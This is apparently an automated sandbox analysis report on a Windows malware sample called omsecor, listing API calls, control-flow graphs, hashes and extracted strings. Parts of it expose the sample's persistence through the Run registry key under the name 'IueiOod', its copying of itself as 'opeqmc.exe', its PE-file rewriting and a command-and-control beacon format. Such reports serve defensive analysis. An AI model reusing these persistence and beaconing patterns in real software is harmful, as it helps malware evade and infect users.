                          • Source File: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Value$AddressHandleModuleProc
                          • String ID: EncodePointer$KERNEL32.DLL
                          • API String ID: 1929421221-3682587211
                          • Opcode ID: cfafac40d43195ef6ab0f83e6a66070465950e04f68e4f312de4a4817b66f2e0
                          • Instruction ID: 2de7d8fd10128b17cfc71597f2b569db04ade18300f5c4710948ea3b5a4a2571
                          • Opcode Fuzzy Hash: cfafac40d43195ef6ab0f83e6a66070465950e04f68e4f312de4a4817b66f2e0
                          • Instruction Fuzzy Hash: 68F06D307017169BD7219F25DE04A5A3AB8AF80790B16417AB844F62F4EF38DC029A6D

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 412 401b21-401b32 TlsGetValue 413 401b34-401b3c 412->413 414 401b55-401b64 GetModuleHandleA 412->414 413->414 415 401b3e-401b4b TlsGetValue 413->415 416 401b66-401b6d call 401a3e 414->416 417 401b89-401b8e 414->417 415->414 421 401b4d-401b53 415->421 416->417 422 401b6f-401b75 GetProcAddress 416->422 423 401b7b-401b7d 421->423 422->423 423->417 424 401b7f-401b85 423->424 424->417
                          APIs
                          • TlsGetValue.KERNEL32(00000000,00401BB6,?,?,?,00402F66), ref: 00401B2E
                          • TlsGetValue.KERNEL32(00000004,?,?,?,00402F66), ref: 00401B45
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00402F66), ref: 00401B5A
                          • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00401B75
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Value$AddressHandleModuleProc
                          • String ID: DecodePointer$KERNEL32.DLL
                          • API String ID: 1929421221-629428536
                          • Opcode ID: 436f779fc0fdf30fb8c2a4f5b6e2e396cf7c0272443af951d572ffac3d80a1eb
                          • Instruction ID: 1a7e216e592b3cd04d2002f0154b272c3d781bc2d345389bf2442321812c8d59
                          • Opcode Fuzzy Hash: 436f779fc0fdf30fb8c2a4f5b6e2e396cf7c0272443af951d572ffac3d80a1eb
                          • Instruction Fuzzy Hash: 96F062305013129BC7215F24DE44E6A3AB89F407947154136F854F22F0EF34DC018A6D

                          Control-flow Graph

                          APIs
                          • GetStartupInfoA.KERNEL32(?), ref: 004016EA
                          • GetProcessHeap.KERNEL32(00000000,00000094), ref: 00401705
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00401708
                          • _fast_error_exit.LIBCMT ref: 00401716
                            • Part of subcall function 00401671: __FF_MSGBANNER.LIBCMT ref: 0040167A
                          • ___security_init_cookie.LIBCMT ref: 004018B6
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$AllocateInfoProcessStartup___security_init_cookie_fast_error_exit
                          • String ID: j`h
                          • API String ID: 2660455748-2627015977
                          • Opcode ID: aba137c0f2f88c3b9200040e126f3ca684e81be6c5eda89adfc1ccd5f8954634
                          • Instruction ID: 7291aa48b631972549e6df949c7a5fbc9f7bec4cf14f78cf3737268845182a7c
                          • Opcode Fuzzy Hash: aba137c0f2f88c3b9200040e126f3ca684e81be6c5eda89adfc1ccd5f8954634
                          • Instruction Fuzzy Hash: C3F02E36D01705A7E720A7B4CE49B6D3134AB88765F35013BF5017B2E2CABC4D06A62D
                          APIs
                          • GetStartupInfoA.KERNEL32(?), ref: 004016EA
                          • GetProcessHeap.KERNEL32(00000000,00000094), ref: 00401705
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00401708
                          • _fast_error_exit.LIBCMT ref: 00401716
                            • Part of subcall function 00401671: __FF_MSGBANNER.LIBCMT ref: 0040167A
                          • ___security_init_cookie.LIBCMT ref: 004018B6
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$AllocateInfoProcessStartup___security_init_cookie_fast_error_exit
                          • String ID: j`h
                          • API String ID: 2660455748-2627015977
                          • Opcode ID: c8d3cbbb43655427b4a603559900b38778fbedebf47b5c9131e32ddd9e0d4b3d
                          • Instruction ID: 38895570f31eb67b982826470c9dd1e6c230b0faa58df9c9f10e023fb9096192
                          • Opcode Fuzzy Hash: c8d3cbbb43655427b4a603559900b38778fbedebf47b5c9131e32ddd9e0d4b3d
                          • Instruction Fuzzy Hash: 4DF0E936E48301D7E720A7A09D49B2D3134AB44765F34053BE001BB2E1CDBC4942661F
                          APIs
                          • __lock.LIBCMT ref: 00403F82
                            • Part of subcall function 004034EE: __mtinitlocknum.LIBCMT ref: 00403502
                            • Part of subcall function 004034EE: __amsg_exit.LIBCMT ref: 0040350E
                            • Part of subcall function 004034EE: RtlEnterCriticalSection.NTDLL(?), ref: 00403516
                          • ___sbh_find_block.LIBCMT ref: 00403F8D
                          • ___sbh_free_block.LIBCMT ref: 00403F9C
                          • HeapFree.KERNEL32(00000000,?,00409450,0000000C,004034CF,00000000,004093D0,0000000C,00403507,?,?,?,00406798,00000004,00409530,0000000C), ref: 00403FCC
                          • GetLastError.KERNEL32(?,00406798,00000004,00409530,0000000C,00404045,?,?,00000000,00000000,00000000,00401CEF,00000001,00000214), ref: 00403FDD
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                          • String ID:
                          • API String ID: 2714421763-0
                          • Opcode ID: 288a25c0387cb816e710d6056d2e667d0bdf05a7bdcb3ee8ac501960d13b8eb0
                          • Instruction ID: 478c35e85f2b107ed22a8aba67e00a0e018390ca299f0d6e226d856ee505d4b6
                          • Opcode Fuzzy Hash: 288a25c0387cb816e710d6056d2e667d0bdf05a7bdcb3ee8ac501960d13b8eb0
                          • Instruction Fuzzy Hash: AB012C71D05602AADB207FB29A0AB5E7A78DF0076AF20413FF404B61D1CB7C8A449A9D
                          APIs
                            • Part of subcall function 00401D3D: __amsg_exit.LIBCMT ref: 00401D4B
                          • __amsg_exit.LIBCMT ref: 00403A5F
                          • __lock.LIBCMT ref: 00403A6F
                          • InterlockedDecrement.KERNEL32(?), ref: 00403A8C
                          • InterlockedIncrement.KERNEL32(02011588), ref: 00403AB7
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Interlocked__amsg_exit$DecrementIncrement__lock
                          • String ID:
                          • API String ID: 4129207761-0
                          • Opcode ID: 8585fda054ee7361396d1f478d0024bbf818f9282079b570ad35bde21b9f8bf2
                          • Instruction ID: 3b707b5fd0894213fb8e8695ce472a26b52a1803b1b57e4fe7db1faaf9775e12
                          • Opcode Fuzzy Hash: 8585fda054ee7361396d1f478d0024bbf818f9282079b570ad35bde21b9f8bf2
                          • Instruction Fuzzy Hash: 3A018E32E00B119BD611AF6A990974A7B64BB05716F05403BE890773D1C73CAB51DFDE
                          APIs
                          • GetLastError.KERNEL32(?,00000000,00404281,00402202,00000000,00402EFA,FFFFFFFE,?,?,?,?,00402F66), ref: 00401CC8
                            • Part of subcall function 00401B98: TlsGetValue.KERNEL32(00000000,00401CDB,?,?,?,00402F66), ref: 00401B9F
                            • Part of subcall function 00401B98: TlsSetValue.KERNEL32(00000000,?,?,00402F66), ref: 00401BC0
                          • __calloc_crt.LIBCMT ref: 00401CEA
                            • Part of subcall function 00404032: __calloc_impl.LIBCMT ref: 00404040
                            • Part of subcall function 00404032: Sleep.KERNEL32(00000000), ref: 00404057
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000000,00401BB6,?,?,?,00402F66), ref: 00401B2E
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000004,?,?,?,00402F66), ref: 00401B45
                            • Part of subcall function 00401C07: GetModuleHandleA.KERNEL32(KERNEL32.DLL,00409328,0000000C,00401D18,00000000,00000000,?,?,?,00402F66), ref: 00401C18
                            • Part of subcall function 00401C07: GetProcAddress.KERNEL32(?,EncodePointer), ref: 00401C4C
                            • Part of subcall function 00401C07: GetProcAddress.KERNEL32(?,DecodePointer), ref: 00401C5C
                            • Part of subcall function 00401C07: InterlockedIncrement.KERNEL32(0040A3C8), ref: 00401C7E
                            • Part of subcall function 00401C07: __lock.LIBCMT ref: 00401C86
                            • Part of subcall function 00401C07: ___addlocaleref.LIBCMT ref: 00401CA5
                          • GetCurrentThreadId.KERNEL32 ref: 00401D1A
                          • SetLastError.KERNEL32(00000000,?,?,?,00402F66), ref: 00401D32
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Value$AddressErrorLastProc$CurrentHandleIncrementInterlockedModuleSleepThread___addlocaleref__calloc_crt__calloc_impl__lock
                          • String ID:
                          • API String ID: 1081334783-0
                          • Opcode ID: 098acf1058f6266e08016df3b7da3ea01f889e9df5624f40869082c495d6053c
                          • Instruction ID: d2849ffa799b97934cc6d9bfafbcb639600e9549b280b5eba9c9c239b681eae2
                          • Opcode Fuzzy Hash: 098acf1058f6266e08016df3b7da3ea01f889e9df5624f40869082c495d6053c
                          • Instruction Fuzzy Hash: 2EF0FF325447229AD6363BB96D0AA8F3AA49F41761711093FF580B61F0CF3CD80296AD

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 305 40abd9-40abf5 call 40ac20 308 40abf7-40ac0c FindFirstFileW 305->308 309 40ac1a 305->309 308->309 310 40ac0e-40ac18 FindClose 308->310 311 40ac1c-40ac1f 309->311 310->311
                          APIs
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                          • FindFirstFileW.KERNEL32(?,00000000), ref: 0040AC03
                          • FindClose.KERNEL32(00000000), ref: 0040AC0F
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FindOpen$CloseFileFirst
                          • String ID:
                          • API String ID: 3155378417-0
                          • Opcode ID: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                          • Instruction ID: fa0310e4c65bbc590993533f650c85f5e3ee77ef27cd51fa1c8f473dbf319076
                          • Opcode Fuzzy Hash: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                          • Instruction Fuzzy Hash: 5DE0D87160C7044BE220E7B49D0C967B3DCAB45325F000F36A9B6E20C0FA38D46A465F

                          Control-flow Graph

                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B36C
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B39D
                            • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                          • GetLastError.KERNEL32(00000004), ref: 0040B3CA
                          • Sleep.KERNEL32(00002710), ref: 0040B3F7
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B413
                          • CopyFileW.KERNEL32(?,?,00000000), ref: 0040B435
                          • ExitProcess.KERNEL32 ref: 0040B44D
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                          • GetLastError.KERNEL32(00000004), ref: 0040B48D
                          • GetLastError.KERNEL32(00000004), ref: 0040B49A
                          • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 0040B4C7
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B4D7
                          • GetLastError.KERNEL32(00000004), ref: 0040B500
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$ErrorLastModuleName$Open$CopyCreateEnvironmentExitExpandProcessSleepStrings
                          • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$opeqmc.exe
                          • API String ID: 3692109554-477663111
                          • Opcode ID: a37a2c0829b51652c0125789b7ef107c293a8625708184dc08050438480bf6fc
                          • Instruction ID: ccf8aad4361994264e72a39918ed7d53ff083e628d4a69ee62a5d407c68d8035
                          • Opcode Fuzzy Hash: a37a2c0829b51652c0125789b7ef107c293a8625708184dc08050438480bf6fc
                          • Instruction Fuzzy Hash: 8C4127719042186AE710B7A19D46FAB73ACEF04345F14447BBB05F11C2EB789A548AAF

                          Control-flow Graph

                          APIs
                          • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                          • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                          • GetFileSize.KERNEL32(?,00000000), ref: 0040762E
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407638
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0040763F
                          • ReadFile.KERNELBASE(?,00000000,00000000,?,00000000), ref: 00407660
                          • WriteFile.KERNELBASE(?,?,00000000,?,00000000), ref: 0040767F
                          • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000), ref: 00407691
                          • ReadFile.KERNELBASE(?,?,00000040,?,00000000), ref: 004076A1
                          • SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 004076AF
                          • ReadFile.KERNELBASE(?,?,000000F8,?,00000000), ref: 004076C5
                          • SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 004076EF
                          • WriteFile.KERNELBASE(?,?,000000F8,?,00000000), ref: 00407705
                          • CloseHandle.KERNELBASE(?), ref: 00407714
                          • CloseHandle.KERNEL32(?), ref: 00407719
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$PointerRead$CloseCreateHandleHeapWrite$AllocateProcessSize
                          • String ID:
                          • API String ID: 2296163861-0
                          • Opcode ID: 894f1e02061cece153af19de11902bbae5fe70548c4ece14d410128547cdf08b
                          • Instruction ID: 7ae3b020874f099f6a4231377d147a855b3f50186be4225f3fece46b7b724b47
                          • Opcode Fuzzy Hash: 894f1e02061cece153af19de11902bbae5fe70548c4ece14d410128547cdf08b
                          • Instruction Fuzzy Hash: F0416A71901028BADB209BA2DD48EEFBF7DEF45390F104476F619F21A0D7709A10DB64

                          Control-flow Graph

                          APIs
                          • InternetOpenUrlW.WININET(?,hOA,?,00000000,04400000,00000000), ref: 00409CCB
                          • GetProcessHeap.KERNEL32(00000000,00002001,?,?,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF4
                          • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF7
                          • InternetReadFile.WININET(?,?,00001000,?), ref: 00409D6E
                          • GetProcessHeap.KERNEL32(00000000,00000002,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D80
                          • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D83
                          • GetProcessHeap.KERNEL32(00000000,00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE3
                          • HeapFree.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE6
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocInternet$FileFreeOpenRead
                          • String ID: hOA
                          • API String ID: 1355009786-3485425990
                          • Opcode ID: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                          • Instruction ID: 638041e7f74e2b46c75c1535d5ef76f15aa532bf5b3977fbb34850ab96fc5943
                          • Opcode Fuzzy Hash: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                          • Instruction Fuzzy Hash: 1B418B71900209FFEB119F65C844BAA7BA9FF44355F14847AF819E6292E778CE80CF54

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CountTick
                          • String ID: .html$0$From: $Page generated at: $Via: $^key=$^nocrypt$hOA
                          • API String ID: 536389180-697497794
                          • Opcode ID: 84a0e12b251b3718d34eddf76b775ad89a92ce41e4fff3615f2568cd6720db27
                          • Instruction ID: 73e0daeea7a9f5f4b783dd0519eebdf5205f1bdf48cad4214514e0173d2ce6b9
                          • Opcode Fuzzy Hash: 84a0e12b251b3718d34eddf76b775ad89a92ce41e4fff3615f2568cd6720db27
                          • Instruction Fuzzy Hash: 27416131A0161997CB25EBA2DC51BDE7369FF44308F0044BFB909B71C1EA78AE948F59

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 169 40a786-40a79a 170 40a7b3-40a7ea call 405511 call 4056f9 call 405529 169->170 171 40a79c 169->171 182 40a7f8-40a7fb call 4056f9 170->182 183 40a7ec-40a7f6 170->183 172 40a7a9 call 406d14 171->172 176 40a7ae-40a7b1 172->176 176->170 178 40a79e-40a7a3 Sleep 176->178 178->172 184 40a800-40a815 call 405529 182->184 183->184 188 40a823-40a826 call 4056f9 184->188 189 40a817-40a821 184->189 190 40a82b-40a846 call 405529 call 406cb5 188->190 189->190 196 40a854 call 4056f9 190->196 197 40a848-40a852 190->197 198 40a859-40a87e call 405529 call 4078cb call 40a718 196->198 197->198 206 40a880-40a892 call 40a744 198->206 209 40a894-40a899 Sleep 206->209 210 40a89f-40a8c5 call 406e69 206->210 209->210 213 40a8d2-40a8d5 210->213 214 40a8c7-40a8cc Sleep 210->214 215 40a8d7-40a8da 213->215 216 40a8dc-40a8df 213->216 214->213 215->216 217 40a8e1-40a8f8 GetProcessHeap HeapFree 215->217 216->206 216->217
                          APIs
                          • Sleep.KERNEL32(00002710,00000000,00000000,00000000), ref: 0040A7A3
                          • Sleep.KERNEL32(0000EA60,?,00000000,00000000,00000000), ref: 0040A899
                          • Sleep.KERNELBASE(00002710,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8CC
                          • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8E5
                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8EC
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Sleep$Heap$AttemptConnectFreeInternetProcess
                          • String ID: 0$confirm^rev=%s^code=%s^param=%s^os=%s
                          • API String ID: 3100629401-2436734164
                          • Opcode ID: c622fb37aa2467ece8f64e14a3bc52ff303aefc1e596290383a82c184368ac36
                          • Instruction ID: 7defdabbc875a2827947a9af70fbac2689cb4d570e6f2fffa55db425585f7fd8
                          • Opcode Fuzzy Hash: c622fb37aa2467ece8f64e14a3bc52ff303aefc1e596290383a82c184368ac36
                          • Instruction Fuzzy Hash: C0418372D00618AACB11EBE1DC859DF73BCEF44304F10847BF505B6181EA789A558F9E

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 218 40782a-40786f GetModuleFileNameW CreateFileW 219 407871-407886 GetFileTime CloseHandle 218->219 220 407888-40788e GetTickCount 218->220 221 4078b0-4078ca call 4057b5 219->221 222 407893-40789d call 40584d 220->222 227 4078a6-4078ae 222->227 228 40789f-4078a5 222->228 227->221 227->222 228->227
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000000,UniqueNum), ref: 0040784D
                          • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00407864
                          • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00407879
                          • CloseHandle.KERNEL32(00000000), ref: 00407880
                          • GetTickCount.KERNEL32 ref: 00407888
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CloseCountCreateHandleModuleNameTickTime
                          • String ID: UniqueNum
                          • API String ID: 1853814767-3816303966
                          • Opcode ID: e7107705f7d645ec0444386ddfffd8695f1bbe122d048c6309b931cdd7db22a5
                          • Instruction ID: 2f8cc66c71eb5b32faf52737d8a911681d4da4e376004c23895cdbe2f04b10ac
                          • Opcode Fuzzy Hash: e7107705f7d645ec0444386ddfffd8695f1bbe122d048c6309b931cdd7db22a5
                          • Instruction Fuzzy Hash: AE110633419220ABD210AB65EC4CA9B7FACEF45760F004A3AF964E21D0D6349211C7AB

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 229 407e2b-407e3b 230 407e3d-407e3f call 407cd7 229->230 231 407e4e-407e7c SetFilePointer ReadFile 229->231 236 407e44-407e4c 230->236 233 407eba 231->233 234 407e7e-407e82 231->234 235 407ebc-407ebe 233->235 234->233 237 407e84 234->237 236->231 236->233 238 407e86-407e8f 237->238 238->238 239 407e91-407ea7 call 405493 238->239 239->233 242 407ea9-407eb8 call 405511 239->242 242->235
                          APIs
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,UniqueNum), ref: 00407E5C
                          • ReadFile.KERNEL32(?,00000064,00000001,00000000), ref: 00407E74
                            • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                            • Part of subcall function 00407CD7: CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CreateModuleNamePointerRead
                          • String ID: UniqueNum$d$hOAd$x
                          • API String ID: 1528952607-1018652783
                          • Opcode ID: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
                          • Instruction ID: 0df55d11f519ebf6f0451cc58b4543fb7278309a9039aac926228ebb90f40a66
                          • Opcode Fuzzy Hash: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
                          • Instruction Fuzzy Hash: 5311A531D09308AADF109B61DD05BDB3B6AAB00324F218676E612F61E0E7749D44CBAE

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 245 40ac20-40ac48 RegOpenKeyExW 246 40ac60-40ac76 RegOpenKeyExW 245->246 247 40ac4a-40ac55 call 4069c0 245->247 248 40ac78-40ac7a 246->248 249 40ac7c-40ac87 call 4069c0 246->249 253 40ac5a-40ac5e 247->253 251 40ac8e-40ac92 248->251 254 40ac8c-40ac8d 249->254 253->246 253->251 254->251
                          APIs
                          • RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                          • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                            • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                            • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Open$CloseQueryValue
                          • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                          • API String ID: 3546245721-4228964922
                          • Opcode ID: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                          • Instruction ID: 3bac8edf5f415b784fe4546894dc74dc09b9405a13c640cee1cd261e7a9a2bb6
